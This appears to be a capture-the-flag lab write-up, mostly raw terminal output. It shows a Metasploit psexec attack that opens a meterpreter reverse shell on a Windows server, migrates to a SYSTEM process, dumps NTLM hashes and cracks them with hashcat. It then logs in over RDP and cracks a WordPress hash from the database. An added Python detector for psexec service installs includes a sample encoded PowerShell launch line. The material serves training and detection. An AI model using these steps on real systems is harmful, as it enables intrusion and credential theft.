10 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi
msf6 > use 4
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.100.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set SMBUser admin
SMBUser => admin
msf6 exploit(windows/smb/psexec) > set SMBPass superman
SMBPass => superman
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.100.50
RHOSTS => 192.168.100.50
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.100.5:4444
[*] 192.168.100.50:445 - Connecting to the server...
[*] 192.168.100.50:445 - Authenticating to 192.168.100.50:445 as user 'admin'...
[*] 192.168.100.50:445 - Selecting PowerShell target
[*] 192.168.100.50:445 - Executing the payload...
[+] 192.168.100.50:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.100.50
[*] Meterpreter session 1 opened (192.168.100.5:4444 -> 192.168.100.50:63889 ) at 2024-08-19 07:11:28 +0530
meterpreter >
meterpreter >
meterpreter > shell
Process 2152 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . : ap-south-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::357a:c324:f4af:4fca%12
IPv4 Address. . . . . . . . . . . : 192.168.100.50
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1
Tunnel adapter isatap.ap-south-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : ap-south-1.compute.internal
C:\Windows\system32>systeminfo
systeminfo
Host Name: WINSERVER-01
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00252-70000-00000-AA535
Original Install Date: 12/31/2021, 8:01:42 AM
System Boot Time: 8/17/2024, 10:37:44 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 16,384 MB
Available Physical Memory: 15,387 MB
Virtual Memory: Max Size: 24,576 MB
Virtual Memory: Available: 22,080 MB
Virtual Memory: In Use: 2,496 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 220 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet 2
DHCP Enabled: Yes
DHCP Server: 192.168.100.1
IP address(es)
[01]: 192.168.100.50
[02]: fe80::357a:c324:f4af:4fca
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\Windows\system32>netusers
netusers
'netusers' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
admin Administrator Guest
mike vince
The command completed with one or more errors.
C:\Windows\system32>exit
exit
meterpreter >
meterpreter >
meterpreter >
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > get system
[-] Unknown command: get
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter >
meterpreter >
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter >
meterpreter >
meterpreter > ps
Process List
============
PID   PPID  Name                      Arch  Session  User                          Path
---   ----  ----                      ----  -------  ----                          ----
0     0     [System Process]
4     0     System                    x64   0
388   748   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
416   4     smss.exe                  x64   0
588   576   csrss.exe                 x64   0
648   748   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
652   644   csrss.exe                 x64   1
680   576   wininit.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
688   644   winlogon.exe              x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
748   680   services.exe              x64   0
756   680   lsass.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
824   748   svchost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
856   748   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
944   688   dwm.exe                   x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
960   748   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
1004  748   svchost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
1112  748   svchost.exe               x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
1180  748   spoolsv.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
1220  748   amazon-ssm-agent.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1304  748   LiteAgent.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
1324  748   svchost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
1368  748   svchost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
1460  748   httpd.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe
1476  1220  ssm-agent-worker.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\ssm-agent-worker.exe
1492  1476  conhost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
1548  748   mysqld.exe                x64   0        NT AUTHORITY\SYSTEM           C:\wamp64\bin\mariadb\mariadb10.6.5\bin\mysqld.exe
1616  1044  powershell.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1680  748   Ec2Config.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1900  1460  httpd.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe
2148  688   LogonUI.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
2272  2412  GoogleCrashHandler.exe    x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
2320  1616  conhost.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
2412  2984  GoogleUpdate.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
2464  748   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
2524  748   svchost.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
2584  748   msdtc.exe                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
2676  2412  GoogleCrashHandler64.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
meterpreter > migrate 680
[*] Migrating from 1616 to 680...
[*] Migration completed successfully.
meterpreter > hashdump
admin:1011:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mike:1009:aad3b435b51404eeaad3b435b51404ee:c7bad7d1cc2f3c69adea5ccb429234ad:::
vince:1010:aad3b435b51404eeaad3b435b51404ee:c9b30a86acaea990bf9fa6c35ac9dd92:::
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >
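The psexec run at the start of this session left SERVICE_NAME empty, so the module installed a service with a random name whose binary launches PowerShell, and the target reported a service start timeout. On the host that sequence appears as Service Control Manager event 7045 (service installed) followed by 7009 (start timeout) for the same service name. The following Python detector is an added example, not part of this writeup; the event lines and their pipe-delimited form are constructed sample data, and the PowerShell one-liner shape in them is the usual one, assumed here.

```python
"""Added example (not from the writeup): spot a psexec-style service install
in Windows System log events (7045 install followed by 7009 start timeout)."""
import re
from datetime import datetime, timedelta

# Constructed sample events in an assumed 'timestamp|event_id|service|image_path'
# layout; not real log output from the target.
SAMPLE_EVENTS = [
    "2024-08-19 01:41:20|7045|Spooler|C:\\Windows\\System32\\spoolsv.exe",
    "2024-08-19 01:41:25|7045|KqXdPzRmAbCwTuYv|%COMSPEC% /b /c start /b /min "
    "powershell.exe -nop -w hidden -e JABzAD0A",
    "2024-08-19 01:41:55|7009|KqXdPzRmAbCwTuYv|",
    "2024-08-19 01:42:10|7045|AmazonSSMAgent|"
    "\"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"",
]

# A service "binary" that is really a cmd/PowerShell one-liner (-e, -enc, /c).
SHELL_LAUNCH = re.compile(
    r"(powershell(\.exe)?|cmd(\.exe)?|%COMSPEC%).*?(\s-e(nc|ncodedcommand)?\s|/c\s)",
    re.IGNORECASE,
)


def parse_event(line: str) -> dict:
    ts, event_id, name, path = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "id": int(event_id),
            "name": name, "path": path}


def suspicious_installs(lines, window=timedelta(minutes=2)):
    """Return [(service_name, [reasons])] for 7045 events worth a look."""
    events = [parse_event(line) for line in lines]
    # First 7009 (start timeout) seen per service name.
    timeouts = {}
    for e in events:
        if e["id"] == 7009:
            timeouts.setdefault(e["name"], e["ts"])
    findings = []
    for e in events:
        if e["id"] != 7045:
            continue
        reasons = []
        if SHELL_LAUNCH.search(e["path"]):
            reasons.append("service binary is a cmd/PowerShell one-liner")
        later = timeouts.get(e["name"])
        if later is not None and timedelta(0) <= later - e["ts"] <= window:
            reasons.append(
                f"7009 start timeout for the same service within "
                f"{int(window.total_seconds())}s")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in suspicious_installs(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```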
Dumping Hashes and Cracking:
root@kali:~# hashcat -m 1000 -a 0 -O wordpresshashes /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 5 digests; 5 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Initializing backend runtime for device #1...
Host memory required for this attack: 64 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Dictionary cache building /usr/share/wordlists/rockyou.Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
72f5cfa80f07819ccbcfb72feb9eb9b7:superman
c7bad7d1cc2f3c69adea5ccb429234ad:diamond
c9b30a86acaea990bf9fa6c35ac9dd92:greenday
31d6cfe0d16ae931b73c59d7e0c089c0:
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: wordpresshashes
Time.Started.....: Mon Aug 19 07:27:46 2024 (25 secs)
Time.Estimated...: Mon Aug 19 07:28:11 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 573.0 kH/s (1.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 4/5 (80.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 6538/14344385 (0.05%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[213134356173382a] -> $HEX[042a0337c2a156616d6f732103]
Started: Mon Aug 19 07:27:08 2024
Stopped: Mon Aug 19 07:28:11 2024
root@kali:~# cat wordpresshashes
admin:1011:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mike:1009:aad3b435b51404eeaad3b435b51404ee:c7bad7d1cc2f3c69adea5ccb429234ad:::
vince:1010:aad3b435b51404eeaad3b435b51404ee:c9b30a86acaea990bf9fa6c35ac9dd92:::
root@kali:~#
MySQL enumeration

Xfreerdp
https://www.mankier.com/1/xfreerdp
xfreerdp /u:admin /p:superman /v:192.168.100.50 /f
WordPress admin hash file cracking:
Navigate to this path as shown in the picture below.

Sign in over RDP using the credentials above.
Open Chrome, go to http://127.0.0.1 and click on phpmyadmin.
Navigate to 127.0.0.1/phpmyadmin4.9.7
username: root
password: (empty)
db: MariaDB

root@kali:~#
root@kali:~#
root@kali:~# hashcat -m 400 -a 0 -o output.txt maria /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Name........: phpass
Hash.Target......: $P$B.1p.5fiYdFnwttTzSkvT2sl01rlOj0
Time.Started.....: Mon Aug 19 07:38:44 2024 (1 sec)
Time.Estimated...: Mon Aug 19 07:38:45 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 154 H/s (8.70ms) @ Accel:32 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 128/14344385 (0.00%)
Rejected.........: 0/128 (0.00%)
Restore.Point....: 64/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7168-8192
Candidates.#1....: samantha -> diamond
Started: Mon Aug 19 07:38:10 2024
Stopped: Mon Aug 19 07:38:45 2024
root@kali:~# cat output.txt
$P$B.1p.5fiYdFnwttTzSkvT2sl01rlOj0:estrella
root@kali:~#
Now that we have the WordPress admin password, we can sign in with these credentials:
http://wordpress.local/wp-login or http://127.0.0.1/wp-login
username: admin
password: estrella


Admin Flag
da5323e3f2534e4e9e47018d91df67b3
Mike flag
4194a63bdbc04716a2d8d4e3343b1b3a